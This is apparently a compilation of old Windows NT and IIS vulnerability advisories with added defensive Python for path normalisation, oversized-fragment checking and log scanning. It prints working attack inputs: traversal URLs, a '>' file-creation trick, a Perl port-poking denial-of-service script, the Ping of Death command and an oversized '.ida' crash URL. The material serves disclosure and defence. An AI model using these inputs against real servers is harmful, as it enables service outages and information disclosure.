Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
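The two defects above (the '..\..' traversal in the first section and the '>' redirection through a script name in this one) share a root cause: the server acted on the raw request path instead of a normalised one. The following Python is an added example written for this page, not code from IIS or from the original posting; it shows the two checks a hardened request handler applies before touching the file system or a command interpreter. The content root '/var/www' and the request paths in the demo are constructed for the demonstration.

```python
import os
import posixpath
from urllib.parse import unquote

# Characters that a command shell would interpret if the script name were
# pasted into a command line (the '>' and %0A%0D cases described above).
FORBIDDEN_IN_SCRIPT_NAME = set("<>|&\r\n\0")


class RequestRejected(ValueError):
    """Raised when a request path must not be served."""


def resolve_request_path(content_root: str, request_path: str) -> str:
    """Map a URL path onto a file under content_root, rejecting traversal.

    - percent-encoding is decoded once before any check (%2e%2e is '..');
    - '\\' is treated as a separator exactly like '/', since NT accepts both;
    - the decision is made on the normalised path, not on a substring search,
      so 'scripts..\\..\\x' (a directory literally named 'scripts..') is
      resolved correctly instead of being pattern-matched.
    """
    decoded = unquote(request_path)
    relative = decoded.replace("\\", "/").lstrip("/")
    collapsed = posixpath.normpath(relative)        # folds '.', '..' and '//'
    if collapsed == ".." or collapsed.startswith("../"):
        raise RequestRejected(f"traversal outside content root: {request_path!r}")
    root = os.path.abspath(content_root)
    candidate = os.path.abspath(os.path.join(root, collapsed))
    # Second, independent check on the absolute result (belt and braces).
    if candidate != root and not candidate.startswith(root + os.sep):
        raise RequestRejected(f"resolved outside content root: {request_path!r}")
    return candidate


def is_served(content_root: str, request_path: str) -> bool:
    """True if the request maps to a file inside the content root."""
    try:
        resolve_request_path(content_root, request_path)
        return True
    except RequestRejected:
        return False


def forbidden_chars_in_script_name(request_path: str) -> list:
    """Return the shell-significant characters found in the decoded script
    name (empty list means the name is safe to hand to a command interpreter).
    Decoding happens first, so %0A%0D is caught as CR/LF, not as text."""
    decoded = unquote(request_path)
    return sorted(ch for ch in FORBIDDEN_IN_SCRIPT_NAME if ch in decoded)


if __name__ == "__main__":
    # Constructed demo requests, modelled on the URLs quoted above.
    for path in ["/index.html", "/..\\..", "/%2e%2e%5c%2e%2e%5cfile.txt"]:
        print(f"{path!r:40} served={is_served('/var/www', path)}")
    for name in ["/scripts/report.bat", "/scripts/script_name%0A%0D>target.bat"]:
        print(f"{name!r:40} bad={forbidden_chars_in_script_name(name)!r}")
```

Note that the traversal check runs after a single round of percent-decoding; a server that decodes twice must run the check after the last decode, or the encoded form '%252e%252e' slips through as an innocent-looking filename.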
----------------------------------------------------------------------

Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

  Telnet to an NT 4.0 system on port 135
  Type about 10 characters followed by a <CR>
  Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):
/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";     # Perl 4-era socket helper: chat::open_port / print / close

$systemname = shift @ARGV;   # host name given on the command line

$verbose = 1;      # tell me what you're hitting
$knownports = 1;   # don't hit known problem ports

for ($port = 0; $port < 65535; $port++)
{
    # skip the ports listed above as known to wedge RPCSS, IIS or DNS
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0

Using a telnet application to connect to a webserver via HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
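What makes the ping above lethal is not the ICMP payload but IP reassembly: 65527 bytes of data plus the 8-byte ICMP header and 20-byte IP header is 65555 bytes, more than the 65535 bytes a 16-bit total-length field can describe, so the last fragment writes past the receiver's reassembly buffer. The following Python is an added example, not code from the original posting: it performs the check an IDS or firewall applies per fragment, namely whether the fragment offset plus the fragment's payload would push the reassembled datagram past 65535 bytes. The packet builder, the 10.0.0.x addresses and the sample fragments are constructed for the demonstration.

```python
import struct

IPV4_MAX_DATAGRAM = 65535   # largest value the 16-bit total-length field can hold
MORE_FRAGMENTS = 0x2000     # MF flag in the flags/fragment-offset word
IPV4_HEADER_FMT = "!BBHHHBBH4s4s"


def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header fields needed for the check."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag,
     _ttl, proto, _csum, _src, _dst) = struct.unpack(IPV4_HEADER_FMT, packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "ihl": ihl,
        "total_len": total_len,
        "ident": ident,
        "more_fragments": bool(flags_frag & MORE_FRAGMENTS),
        "frag_offset": (flags_frag & 0x1FFF) * 8,   # field is in 8-byte units
        "proto": proto,
        "payload_len": total_len - ihl,
    }


def reassembled_end(header: dict) -> int:
    """Byte position at which this fragment's data would end after reassembly."""
    return header["frag_offset"] + header["payload_len"]


def is_oversized_fragment(packet: bytes) -> bool:
    """True if accepting this fragment would make the datagram exceed 65535 bytes.

    This is the coarse classic check (offset + length > 65535); a stack that
    allocated exactly that much reassembly space is what the Ping of Death overran."""
    return reassembled_end(parse_ipv4_header(packet)) > IPV4_MAX_DATAGRAM


def build_ipv4_fragment(payload_len: int, frag_offset_units: int,
                        more_fragments: bool, proto: int = 1) -> bytes:
    """Constructed test fragment: minimal header, zero checksum, zero payload."""
    flags_frag = (MORE_FRAGMENTS if more_fragments else 0) | (frag_offset_units & 0x1FFF)
    header = struct.pack(IPV4_HEADER_FMT, 0x45, 0, 20 + payload_len, 0x1234,
                         flags_frag, 64, proto, 0,
                         bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + bytes(payload_len)


if __name__ == "__main__":
    # A normal 64-byte echo request and the final fragment of an oversized one
    # (offset 8189 * 8 = 65512 bytes, plus 43 bytes of data = 65555 bytes).
    normal = build_ipv4_fragment(64, 0, False)
    last_of_big = build_ipv4_fragment(43, 8189, False)
    for name, pkt in [("normal echo", normal), ("oversized last fragment", last_of_big)]:
        h = parse_ipv4_header(pkt)
        print(f"{name}: ends at {reassembled_end(h)} -> oversized={is_oversized_fragment(pkt)}")
```

A receiver that sizes its reassembly buffer from the first fragment cannot know the final length until the last fragment arrives, which is why the check has to run on every fragment rather than once per datagram.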
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or similar. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
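Every issue on this page leaves a recognisable trace in the web server log: a '..' segment in the path, a redirection character or CR/LF in a script name, an .ida/.idq request, or a request line far longer than any real page. The following Python is an added example written for this page, not code from IIS or from the original posting: it scans W3C extended log lines for those indicators. The log lines, the 192.0.2.x client addresses and the 4096-byte length threshold are constructed assumptions for the demonstration (the page's crash URL is about 25 KB, so any threshold well above normal request sizes works).

```python
from urllib.parse import unquote

# Assumed threshold for this example; tune to the longest legitimate URL you serve.
DEFAULT_MAX_URI_LEN = 4096


def _has_traversal(decoded_stem: str) -> bool:
    # Both separators count, and the test is on whole segments, so 'a..b' is not a hit.
    return ".." in decoded_stem.replace("\\", "/").split("/")


def classify_request(stem: str, query: str, max_uri_len: int = DEFAULT_MAX_URI_LEN) -> list:
    """Return the indicators matched by one request (empty list if nothing matched)."""
    decoded = unquote(stem)
    reasons = []
    if _has_traversal(decoded):
        reasons.append("path-traversal")
    if any(ch in decoded for ch in "<>|\r\n"):
        reasons.append("shell-metacharacter")
    if decoded.lower().endswith((".ida", ".idq")):
        reasons.append("ida-idq-request")
    if len(stem) + len(query) > max_uri_len:
        reasons.append("overlong-uri")
    return reasons


def analyze_iis_log(text: str, max_uri_len: int = DEFAULT_MAX_URI_LEN) -> list:
    """Scan W3C extended log text; returns (line_no, client_ip, reasons) per suspicious request.

    Field names are taken from the '#Fields:' directive, so the function does not
    depend on a fixed column order; lines with the wrong field count are skipped."""
    hits = []
    fields = None
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue   # malformed line: skip rather than guess at columns
        rec = dict(zip(fields, values))
        query = rec.get("cs-uri-query", "-")
        reasons = classify_request(rec.get("cs-uri-stem", ""),
                                   "" if query == "-" else query, max_uri_len)
        if reasons:
            hits.append((line_no, rec.get("c-ip", "?"), reasons))
    return hits


# Constructed sample log, one line per pattern described on this page plus two clean requests.
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "1999-03-01 10:00:01 192.0.2.10 GET /default.htm - 200",
    "1999-03-01 10:00:02 192.0.2.11 GET /..\\..\\somefile.txt - 403",
    "1999-03-01 10:00:03 192.0.2.12 GET /scripts/script_name%0A%0D>target.bat - 502",
    "1999-03-01 10:00:04 192.0.2.13 GET /anything.idq - 404",
    "1999-03-01 10:00:05 192.0.2.14 GET /" + "." * 5000 + "ida - 500",
    "1999-03-01 10:00:06 192.0.2.15 GET /images/logo.gif - 200",
])


if __name__ == "__main__":
    for line_no, ip, reasons in analyze_iis_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} -> {', '.join(reasons)}")
```

The detection decodes the stem once, just as the resolver that serves the request would, so an encoded '%2e%2e%5c' is classified the same way as a literal '..\'. Status codes are deliberately ignored: a 403 or 404 on an .ida request still tells you someone was probing, and the page's path-disclosure case returns an error page with the physical path in it.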